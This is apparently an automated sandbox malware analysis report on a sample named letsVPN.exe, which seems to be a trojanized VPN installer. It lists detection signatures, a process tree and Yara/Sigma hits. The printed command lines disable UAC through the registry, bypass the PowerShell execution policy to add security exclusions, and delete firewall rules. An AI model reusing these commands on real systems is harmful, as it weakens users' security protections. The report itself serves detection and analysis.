Windows Analysis Report
letsVPN.exe

Overview

General Information

Sample name: letsVPN.exe
Analysis ID: 1582024
MD5: ef0f5b020ea3238a98642cd7b56d84bb
SHA1: 9bfb209e7d43739cc9dea530680b0c4ecdbf5981
SHA256: abf9a5632221e9fe423c9eeeb4c205497bf5bb1ff4aad8561609d81eaa82976e
Tags: exe, user-aachum

Detection

Score: 62
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to many ports of the same IP (likely port scanning)
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Modifies the DNS server
Modifies the windows firewall
Performs a network lookup / discovery via ARP
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Sample is not signed and drops a device driver
Uses cmd line tools excessively to alter registry or file data
Uses ipconfig to lookup or modify the Windows network settings
Uses known network protocols on non-standard ports
Uses netsh to modify the Windows network and firewall settings
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates driver files
Creates files inside the driver directory
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables driver privileges
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Tap Installer Execution
Stores files to the Windows start menu directory
Stores large binary data to the registry
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Yara detected Keylogger Generic

Classification

  • System is w10x64
  • letsVPN.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\letsVPN.exe" MD5: EF0F5B020EA3238A98642CD7B56D84BB)
    • cmd.exe (PID: 7372 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • ipconfig.exe (PID: 7420 cmdline: ipconfig /all MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • netsh.exe (PID: 7460 cmdline: "C:\Windows\System32\netsh.exe" exec C:\ProgramData\QqXF5.xml MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
    • cmd.exe (PID: 7548 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\b6Jzu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • reg.exe (PID: 7592 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 7608 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • reg.exe (PID: 7636 cmdline: reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F MD5: 227F63E1D9008B36BDBCC4B397780BE4)
    • cmd.exe (PID: 7828 cmdline: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7732 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • mmc.exe (PID: 7884 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • sinaplayer_service.exe (PID: 7936 cmdline: "C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe" MD5: 68411B35F7B40B45AFC4A60A2681549D)
      • cmd.exe (PID: 8136 cmdline: C:\Windows\system32\cmd.exe /c ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 6048 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • mmc.exe (PID: 8064 cmdline: C:\Windows\system32\mmc.exe -Embedding MD5: 58C9E5172C3708A6971CA0CBC80FE8B8)
    • letsvpn-latest.exe (PID: 8108 cmdline: "C:\ProgramData\letsvpn-latest.exe" MD5: 9F5F358AA1A85D222AD967F4538BC753)
      • powershell.exe (PID: 6540 cmdline: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 7576 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 7848 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tapinstall.exe (PID: 8168 cmdline: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901 MD5: 1E3CF83B17891AEE98C3E30012F0B034)
        • conhost.exe (PID: 8180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7280 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7696 cmdline: netsh advfirewall firewall Delete rule name=lets MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5356 cmdline: cmd /c netsh advfirewall firewall Delete rule name=lets.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 1448 cmdline: netsh advfirewall firewall Delete rule name=lets.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 7152 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 2220 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO.exe MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 1240 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsPRO MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 5364 cmdline: netsh advfirewall firewall Delete rule name=LetsPRO MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • cmd.exe (PID: 5436 cmdline: cmd /c netsh advfirewall firewall Delete rule name=LetsVPN MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 6436 cmdline: netsh advfirewall firewall Delete rule name=LetsVPN MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
      • LetsPRO.exe (PID: 4428 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 4372 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
      • LetsPRO.exe (PID: 3808 cmdline: "C:\Program Files (x86)\letsvpn\LetsPRO.exe" MD5: 3530CB1B45FF13BA4456E4FFBCAE6379)
        • LetsPRO.exe (PID: 2448 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
          • cmd.exe (PID: 4744 cmdline: "cmd.exe" /C ipconfig /all MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ipconfig.exe (PID: 4568 cmdline: ipconfig /all MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
          • cmd.exe (PID: 7132 cmdline: "cmd.exe" /C route print MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ROUTE.EXE (PID: 3640 cmdline: route print MD5: C563191ED28A926BCFDB1071374575F1)
          • cmd.exe (PID: 2824 cmdline: "cmd.exe" /C arp -a MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • ARP.EXE (PID: 6172 cmdline: arp -a MD5: 4D3943EDBC9C7E18DC3469A21B30B3CE)
  • svchost.exe (PID: 5712 cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • drvinst.exe (PID: 5228 cmdline: DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\letsvpn\driver" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
    • drvinst.exe (PID: 8152 cmdline: DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000011C" MD5: 294990C88B9D1FE0A54A1FA8BF4324D9)
  • svchost.exe (PID: 7120 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • WmiApSrv.exe (PID: 6668 cmdline: C:\Windows\system32\wbem\WmiApSrv.exe MD5: 9A48D32D7DBA794A40BF030DA500603B)
  • svchost.exe (PID: 7296 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 4164 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • LetsPRO.exe (PID: 5884 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
    • LetsPRO.exe (PID: 1284 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" "/silent" MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
  • LetsPRO.exe (PID: 7396 cmdline: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent MD5: 56162A01D3DE7CB90EB9A2222C6B8F24)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Program Files (x86)\letsvpn\Update.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
C:\Program Files (x86)\letsvpn\app-3.12.0\libwin.dll | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
Process Memory Space: letsvpn-latest.exe PID: 8108 | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source | Rule | Description | Author | Strings
56.2.LetsPRO.exe.682d0000.21.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Source: Process started, Author: frack113, Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 8108, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 6540, ProcessName: powershell.exe
Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), Data: Details: "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" /silent, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 2448, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\LetsPRO
Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe, ProcessId: 2448, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1g43hckv.0dv.ps1
Source: Process started, Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems), Data: Command: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll, CommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 7264, ParentProcessName: letsVPN.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\0zVlL\Jd0i4~16\s+C:\ProgramData\0zVlL\Jd0i4~16\a C:\ProgramData\0zVlL\Jd0i4~16\base.dll, ProcessId: 7828, ProcessName: cmd.exe
Source: Process started, Author: Daniil Yugoslavskiy, Ian Davis, oscd.community, Data: Command: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, NewProcessName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, OriginalFileName: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 8108, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901, ProcessId: 7576, ProcessName: tapinstall.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\ProgramData\letsvpn-latest.exe" , ParentImage: C:\ProgramData\letsvpn-latest.exe, ParentProcessId: 8108, ParentProcessName: letsvpn-latest.exe, ProcessCommandLine: powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1" , ProcessId: 6540, ProcessName: powershell.exe
Source: Process started, Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Data: Command: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\letsVPN.exe", ParentImage: C:\Users\user\Desktop\letsVPN.exe, ParentProcessId: 7264, ParentProcessName: letsVPN.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c ipconfig /all, ProcessId: 7372, ProcessName: cmd.exe
Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7732, ProcessName: svchost.exe

No Suricata rule has matched

AV Detection

Source: letsVPN.exe, Virustotal: Detection: 32%
Source: letsVPN.exe, ReversingLabs: Detection: 23%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 82.4% probability
Source: letsVPN.exe, Joe Sandbox ML: detected
Source: C:\ProgramData\letsvpn-latest.exe, Window detected: < &Back, I &Agree, Cancel, Nullsoft Install System v3.10, License Agreement, "Please review the license terms before installing letsvpn. Press Page Down to see the rest of the agreement."
              Source: Binary string: D:\Code\SVGImage\Source\SVGImage\obj\Release\net46\SVGImage.pdb4 source: letsvpn-latest.exe, 00000013.00000003.2382726468.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Data.Common/netfx\System.Data.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2404532270.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.FileSystem.DriveInfo\4.0.2.0\System.IO.FileSystem.DriveInfo.pdb source: letsvpn-latest.exe, 00000013.00000003.2421249747.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Drawing.Common/net461-Release/System.Drawing.Common.pdb source: letsvpn-latest.exe, 00000013.00000003.2415149418.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Security.Principal.Windows/net461-Windows_NT-Release/System.Security.Principal.Windows.pdbSHA256zqXL source: letsvpn-latest.exe, 00000013.00000003.2475399592.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\ipnetwork\src\System.Net.IPNetwork\obj\release\net46\System.Net.IPNetwork.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2441430774.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Resources.Writer\4.0.2.0\System.Resources.Writer.pdb source: letsvpn-latest.exe, 00000013.00000003.2453541303.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: WebView2Loader.dll.pdb source: letsvpn-latest.exe, 00000013.00000003.2540392620.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2522666956.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2541195022.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\Utils\obj\Release\Utils.pdb} source: letsvpn-latest.exe, 00000013.00000003.2505805799.0000000002832000.00000004.00000020.00020000.00000000.sdmp, LetsPRO.exe, 00000036.00000002.2776314664.0000000005442000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: /_/artifacts/obj/System.IO.FileSystem.AccessControl/net461-Windows_NT-Release/System.IO.FileSystem.AccessControl.pdb source: letsvpn-latest.exe, 00000013.00000003.2420610535.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Syndication/net461-Release/System.ServiceModel.Syndication.pdb source: letsvpn-latest.exe, 00000013.00000003.2480597366.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\obj\Release\net40\Mono.Cecil.pdbSHA256) source: letsvpn-latest.exe, 00000013.00000003.2370416127.000000000283B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\projects\sqlite-net-extensions\SQLiteNetExtensionsAsync\obj\Release\netstandard1.1\SQLiteNetExtensionsAsync.pdbSHA2562` source: letsvpn-latest.exe, 00000013.00000003.2379177568.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\winsign\samuli\source\repos\tap-windows6\src\x64\Release\tap0901.pdb source: letsvpn-latest.exe, 00000013.00000003.2321708359.0000000002835000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2696574571.00000240C454C000.00000004.00000020.00020000.00000000.sdmp, drvinst.exe, 00000021.00000003.2702190393.00000240C460C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\obj\Squirrel\Release\net45\Squirrel.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2385529733.0000000002833000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Console\4.0.2.0\System.Console.pdb source: letsvpn-latest.exe, 00000013.00000003.2402237469.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Configuration.ConfigurationManager/net461-windows-Release/System.Configuration.ConfigurationManager.pdb source: letsvpn-latest.exe, 00000013.00000003.2399608066.000000000283D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: letsvpn-latest.exe, 00000013.00000003.2439763366.000000000283A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.ComponentModel.EventBasedAsync\4.0.11.0\System.ComponentModel.EventBasedAsync.pdb source: letsvpn-latest.exe, 00000013.00000003.2394069792.0000000002835000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Reflection.Primitives\4.0.1.0\System.Reflection.Primitives.pdb$*>* 0*_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2450800021.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\65\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Pipes.AccessControl/netfx\System.IO.Pipes.AccessControl.pdb/5I5 ;5_CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2426101916.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Diagnostics.TraceSource\4.0.2.0\System.Diagnostics.TraceSource.pdb source: letsvpn-latest.exe, 00000013.00000003.2413671247.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.UnmanagedMemoryStream\4.0.3.0\System.IO.UnmanagedMemoryStream.pdb source: letsvpn-latest.exe, 00000013.00000003.2430018462.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Threading.Timer\4.0.1.0\System.Threading.Timer.pdbt( source: letsvpn-latest.exe, 00000013.00000003.2495322784.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\sources\cecil\symbols\pdb\obj\Release\net40\Mono.Cecil.Pdb.pdb source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: InternalNameMono.Cecil.Pdb.dllf! source: letsvpn-latest.exe, 00000013.00000003.2365515835.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\LetsVPNInfraStructure\obj\Release\LetsVPNInfraStructure.pdb source: letsvpn-latest.exe, 00000013.00000003.2349540306.000000000283E000.00000004.00000020.00020000.00000000.sdmp
